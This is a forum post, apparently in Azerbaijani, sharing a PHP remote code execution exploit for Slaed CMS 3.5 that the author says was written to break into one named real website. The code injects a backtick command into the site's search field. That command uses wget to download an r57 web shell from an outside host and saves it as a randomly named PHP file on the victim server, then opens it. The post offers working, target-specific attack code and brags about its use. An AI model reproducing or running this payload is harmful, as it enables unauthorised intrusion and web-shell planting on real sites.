Bu da yazdığım exploit))
Vurun getsin:
http://pastebin.com/59hHuKbr
Kod:
<?php
/*
Slaed 3.5 PHP Code Execution Exploit By AkaStep !!!
~~~~~~~~~ Vuln Discovered By Pun!sh3r (Respect!) ~~~~~~~
Exploit shell_exec() funksiyasindan istifade edir.
Sirf bu serverde safe_mode off oldugundan s*kmek problemsizdir))
Diger versiyasi bu exploitin yazilib safe_mode ON/OFF girmir ona(Privatedir)
(31.03.2012)
*/
$shell='http://r57.biz/r57.txt';
if($_SERVER['REQUEST_METHOD'] !=='POST')
{
$rndname=substr(sha1(md5(rand(4545151,589412) . md5(time()))),0,8) . '.php';
}
$shellurlishere='http://www.newarmenia.net/' . $rndname;
echo str_repeat('<ul>',4) .
'<h1>Slaed 3.5 PHP Code Execution Exploit By AkaStep !!!
<br>~~~~~~~~~ Vuln Discovered By Pun!sh3r (Respect!) ~~~~~~~
<br>
Bu exploit xususile newarmenia.net saytini S*kmek ucun yazilib.
<br>(31.03.2012)<br>
</h1>
<br>
<br><p>Shellin Unvanini Submitden sonra olacaq:(Yaz onu Notepada Indiden)<br>
Bu her defe deyisilir!
<font color="red" size="4">' . $shellurlishere. '</font>
<br>
Submit Duymesini Basan kimi Yeni bir URL acilacaq (shellin unvani)<br>
O NOT FOUND vere biler bu halda sadece hemin Not Found veren shell <br>
unvanini Refresh ele shell acilacaq.</p>' .
'<form action="http://www.newarmenia.net/index.php?name=Search" method="post">' .PHP_EOL .
'<input type="hidden" readonly="true" name="word" value="mod=Links&word=${@`wget ' . $shell . ';' . 'mv r57.txt ' . $rndname . '`}"'. '/>'. PHP_EOL .
'
<input type="submit" title="Pwn It Now" value="Lets Fuck Bitchez!" onclick="document.forms[0].submit();window.open(\'' . $shellurlishere . '\');" />' .PHP_EOL .
'</form>'. str_repeat('</ul>',4) .PHP_EOL;
?>
edit:İNdi baxdım bu vuln http://packetstormsecurity.org/files/104999/Slaed-CMS-Code-Execution.html
brain[pillow] tərəfindən tapılıb Sep 12 2011
İstənilən halda Exploit biz tərəfdən yazılıb.